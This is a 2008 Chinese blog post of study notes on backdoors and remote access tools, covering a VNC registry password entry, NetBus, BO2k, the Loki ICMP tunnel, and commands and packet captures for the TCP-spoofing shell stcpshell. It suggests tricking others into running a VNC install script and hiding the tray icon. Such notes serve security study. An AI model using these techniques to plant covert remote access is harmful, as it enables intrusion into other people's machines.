Chinaunix首页 | 论坛 | 博客
  • 博客访问: 19911552
  • 博文数量: 679
  • 博客积分: 10495
  • 博客等级: 上将
  • 技术积分: 9308
  • 用 户 组: 普通用户
  • 注册时间: 2006-07-18 10:51
文章分类

全部博文(679)

文章存档

2012年(5)

2011年(38)

2010年(86)

2009年(145)

2008年(170)

2007年(165)

2006年(89)

分类: 网络与安全

2008-05-30 10:55:34

后门和远程访问工具

本章中的多数工具有过久的嫌疑,还需要及时跟踪相关网站。

 

       AT&T实验室开发,。由服务器和客户端组成,同时VNC还有web server的方式。

    多数杀毒软件把VNC当作正常软件。

    WindowsVNC web server的默认端口5800VNC 5900.如果设置为1,则对应58015901端口。访问举例:4.1版本中可以让本地用户选择是否允许远程接入,访问控制也可以基于IP或一个网段。收费版本还支持windows域的集成。

    密码设置如下:

[HKEY_CURRENT_USER\Software\RealVNC\WinVNC4]

"Password"=hex:15,0a,44,88,72,71,ba,9

        命令行下添加:

C:\>reg export HKCU\Software\RealVNC\WinVNC4 vnc.txt

The operation completed successfully.

C:\>type vnc.txt

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\RealVNC\WinVNC4]

"Password"=hex:15,0a,44,88,72,71,ba,90

        你可以写个脚本,然后勾引它人执行。脚本见教材中的图片。另外还可以通过修改源码方式去掉桌面右下角显示的图标。

    Unix下面更简单,任何用户都可以执行。不过非root用户不能使用80端口等1024以下的端口。

    比如:

# /usr/X11R6/bin/vncserver

 

You will require a password to access your desktops.

 

Password:

Verify:  

Would you like to enter a view-only password (y/n)? n

xauth:  creating new authority file /root/.Xauthority

 

New 'X' desktop is KGS-87-14:2

 

Creating default startup script /root/.vnc/xstartup

Starting applications specified in /root/.vnc/xstartup

Log file is /root/.vnc/KGS-87-14:2.log

 

通过netstat可以看到监听端口是5802,可以这样访问:

# netstat -anp | grep -i vnc

tcp        0      0 0.0.0.0:5802            0.0.0.0:*               LISTEN      20682/Xvnc         

tcp        0      0 0.0.0.0:5902            0.0.0.0:*               LISTEN      20682/Xvnc         

tcp        0      0 0.0.0.0:6002            0.0.0.0:*               LISTEN      20682/Xvnc         

tcp        0      0 :::6002                 :::*                    LISTEN      20682/Xvnc         

unix  2      [ ACC ]     STREAM     LISTENING     32713  20682/Xvnc          /tmp/.X11-unix/X2

unix  3      [ ]         STREAM     CONNECTED     32734  20682/Xvnc          /tmp/.X11-unix/X2

unix  3      [ ]         STREAM     CONNECTED     32732  20682/Xvnc          /tmp/.X11-unix/X2

 

       NETBUS的图形不如VNC友好,主要针对黑客应用。很多杀毒软件不允许它存在。它也很难高效率的使用。在很多安全网站都有下载,比如:http://www.packetstormsecurity.org。这里不做详细介绍,参见教材。

 

Back Orifice 2000 (BO2k)Netbus的下一代后门访问工具,不过这个工具依然被多数杀毒软件拒绝。

可以在以下地址下载:

http://www.packetstormsecurity.com and http://www.securityfocus.com.

最新版本:可以在找到。

windows 2003上面运行好像有一定的问题,这里不详细介绍,参见教材。

教程参见:

    它的fingerprint呈现乱象,能越过一些杀毒软件。远程控制功能和Netbus and BO2k类似。下载地址:http://www.packetstormsecurity.org等。俺是从这里下载的:

工具的主页地址:

 

§10.5           LOKI

       Loki利用icmp,下载:http://www.packetstormsecurity.org

    特征:出现较大的ICMP包,使用固定的ICMP sequence numberICMP Ping reply

       以下部分略

§10.6           STCPSHELL

    利用TCP欺骗

# gcc -o stcpshell stcpshell.c

比如在服务器端执行:./stcpshell –s

客户端执行:./stcpshell -c -si 10.50.48.16 -ci 10.50.44.89

 

抓包的结果:

# tcpdump | grep 207.46.

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

10:50:11.267702 IP 207.46.131.137.1234 > 10.50.48.16.rwhois: . 171060313:171060354(41) win 40871

10:50:11.270461 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1375898480:1375898570(90) win 36097

10:50:11.270472 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3440991056:3440991160(104) win 42831

10:50:11.270482 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1535340155:1535340248(93) win 40372

10:50:11.270491 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1320783922:1320784015(93) win 33749

10:50:11.270501 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3036454421:3036454522(101) win 20896

10:50:11.270511 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3886074393:3886074496(103) win 1317

10:50:11.270523 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1311279958:1311280030(72) win 31919

10:50:11.270535 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 4227081789:4227081894(105) win 49784

10:50:11.270544 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1333404956:1333405038(82) win 38769

10:50:11.270553 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1052880903:1052880936(33) win 39064

10:50:11.270565 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 894260252:894260342(90) win 12062

10:50:11.270574 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3002324501:3002324605(104) win 54439

10:50:11.270586 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 642279503:642279596(93) win 14237

10:50:11.270594 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1019367452:1019367534(82) win 11787

10:50:11.270602 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 2864369021:2864369054(33) win 26215

10:50:11.270612 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 702565164:702565234(70) win 22597

10:50:11.270621 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 4038513002:4038513080(78) win 20380

10:50:11.270631 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3895738653:3895738726(73) win 50316

10:50:11.270640 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 4088035641:4088035724(83) win 12523

10:50:11.270648 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 93527158:93527257(99) win 35281

10:50:11.270667 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3245275253:3245275354(101) win 44038

10:50:11.270676 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 3658560846:3658560915(69) win 6828

10:50:11.270687 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 2148769387:2148769492(105) win 11225

10:50:11.270695 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 2199832619:2199832652(33) win 7459

10:50:11.270722 IP 207.46.131.137.rwhois > 10.50.44.89.1234: . 1841260883:1841260929(46) win 46908

 

可以修改伪造的IP

    /* from  .. you BETTER change this */
    pkt.ip.ip_src.s_addr=inet_addr("207.46.131.137");

§10.6           KNARK

本工具只针对linux 2.2的内核,略

阅读(10470) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~